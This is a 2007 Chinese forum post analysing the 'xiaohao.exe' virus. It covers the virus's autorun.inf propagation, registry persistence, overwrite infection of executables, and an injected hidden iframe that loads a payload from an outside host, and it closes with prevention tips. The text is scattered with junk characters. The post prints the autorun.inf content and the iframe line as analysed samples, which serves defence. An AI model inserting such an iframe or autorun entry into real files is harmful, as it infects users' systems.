|
|
File: C:\Documents and Settings\Administrator\桌面\xiaohao.exe- S% x1 X. J, f) }% a
Size: 12288 bytes ?$ X. W: ~' R
File Version: 1, 0, 0, 1. S! E3 R/ _, [' g6 W
Modified: 2007年8月14日, 21:03:22/ {) V) n' y( T" w `: ^1 t) l' C$ `
MD5: B50ED06B61CDCF060D0136784999E50C4 {* V* l$ v( B3 d! @/ y, E
SHA1: ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD! |1 T \ ]1 t4 |4 C, m
CRC32: 5CC1E47A
3 {! |" u4 a. S7 B( A加壳方式:UPX
; b( R* @$ d+ [3 D8 p病毒运行后:
4 h. | v6 E" `. w! _( e9 R6 D1.生成如下文件:9 g @% m* G+ v8 v! s% W
%SystemRoot%\system32\exloroe.exe
- g! u! |, p( K0 I9 z每个分区下生成一个xiaohao.exe 和autorun.inf
9 N5 ^4 Q# x9 F* M2 Z/ M3 wautorun.inf内容
8 }, X# H. a# B' T* J) M[Autorun]
& p w/ F0 j2 y; R Bopen=Xiaohao.exe5 W; D' }- h1 Q& u
shellexecute=Xiaohao.exe% D$ K( ?8 ^3 }
shell\Auto\command=Xiaohao.exe/ Q. ^: q0 g2 i: G( S
2.添加注册表项目
( K' J% t3 p# G5 LHKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}% K% H+ H1 {( w8 }2 R. ]3 t
指向 %SystemRoot%\system32\exloroe.exe达到开机启动目的 j5 V: @* k# `. w8 x3 y) x. Z
3.修改注册表键值HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue为0x00000000
$ O% Q) m5 A4 q4 D9 f破坏显示隐藏文件0 z9 d8 c# D& j3 o
删除HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu21 P2 s; v( @ t9 e+ b
从而删除开始菜单中所有的快捷方式! b! y! }6 ~5 Z" f
4.感染文件
# } h+ t% N* N3 s' Y5 I' R5 a b从系统盘开始 查找所有*.exe的文件 将自身病毒体写入到正常文件中,被感染后的文件图标为一个表示有“浩”字的图标,病毒采取覆盖感染的方式,被感染的! S* f+ v1 s/ [, N- q
exe无法修复) C) l& S" M2 Y2 R) H
从系统盘开始 查找所有*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 在其尾部加入代码
' l: u6 t: t( T8 z<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>; r4 N. R8 Y$ }2 c
所有感染的文件的文件名记录在C:\Jilu.txt里面
9 L# h j7 Y @( G/ {( N并将所有未能感染的文件属性变为隐藏
" ^" l0 }+ o0 j! F# {: a: V8 n& K5.病毒运行时,所有窗口标题变为“已中毒,X14o-H4o's Virus”* A7 H/ r& T( U7 u6 V; Y1 Z
6.系统时间改为2005年1月17日$ B( j/ g4 t6 Q/ e
病毒作者将其QQ号码和博客公布于互联网上,以此炫耀自己的技术。作者的行为和原先的兔子病毒很相像,为了炫耀。3 M% E L, E" R1 a( J
由于病毒感染所有exe文件 所以重启以后可能会造成ntoskrnl.exe,ntkrnlpa.exe等核心启动文件被修改从而造成系统启动失败$ ], a+ z! V. |- S) B
如果中了此类病毒 那么几乎等于判了死刑 必须重装系统 而且要将其他盘里面所有的*.exe,*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 文件删掉
, d1 f& |( T' q0 P e: |; L希望大家注意如下几点防范此类病毒
1 b" _* ~3 K. Y S0 C# H1.安装还原精灵、冰点还原、雨过天晴等还原软件(没装还软软件的参考下两条)
% H3 `9 H3 w0 y3 ~- Q, t2.及时升级杀毒软件,防火墙,一定打全系统补丁9 T+ |, F: o3 V3 Q0 x' }
3.禁用U盘等移动设备的自动播放功能:在“开始”菜单的“运行”框中运行“gpedit.msc”命令,在“组策略”找到“计算机配置”和“用户配置”下的“管理模板”功能,打开其中的“系统”菜单中的“关闭自动播放”的设置,在其属性里面选择“已启用”,接着选择“所有驱动器”,最后确定保存即可 |
|
IP卡
狗仔卡
发表于 2007-9-16 09:33:42
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
楼主